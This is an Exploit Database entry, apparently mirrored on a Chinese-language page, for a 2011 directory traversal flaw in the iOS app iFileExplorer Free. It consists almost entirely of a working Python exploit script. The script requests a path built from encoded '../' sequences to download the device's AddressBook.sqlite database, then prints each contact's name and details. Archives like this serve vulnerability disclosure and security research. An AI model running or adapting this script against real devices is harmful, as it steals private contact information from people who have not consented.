iOS iFileExplorer Free – Directory Traversal

• Exploit Database
• 10 阅读

• 作者： theSmallNothin
  日期： 2011-03-04
• 类别：

  • remote
  平台：

  • ios
• 来源：https://www.exploit-db.com/exploits/16278/

• # Exploit Title: iPod Touch/iPhone iFileExplorer Free Directory Traversal
  # Date: 04/03/2011 #UK date format
  # Author: theSmallNothing
  # Software Link: http://itunes.apple.com/gb/app/ifileexplorer-protect-multi/id355253462?mt=8
  # Version: 2.8
  # Tested on: iPod Touch 2G (4.1)
  
  import urllib, sqlite3
  
  base = "http://192.168.0.3/" #Change to iDevice ip
  url = base + "..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/var/mobile/Library/AddressBook/AddressBook.sqlitedb" #Jailbroken Address
  
  try:
  urllib.urlretrieve(url,"addressbook.sqlite")
  print "Grabbed Address Book\n"
  except:
  print "Could not grab address book..."
  
  conn = sqlite3.connect("addressbook.sqlite")
  cursor = conn.cursor()
  cmd = "SELECT * FROM ABPerson"
  cursor.execute(cmd)
  results = cursor.fetchall()
  for person in results:
  if person[1] == None:
  continue
  print person[1], person[2]
  
  cmd = "SELECT * FROM ABMultiValue WHERE record_id="+str(person[0])
  cursor.execute(cmd)
  vunDataArr = cursor.fetchall()
  for vunData in vunDataArr:
  if vunData[5] != None:
  print "\t"+vunData[5]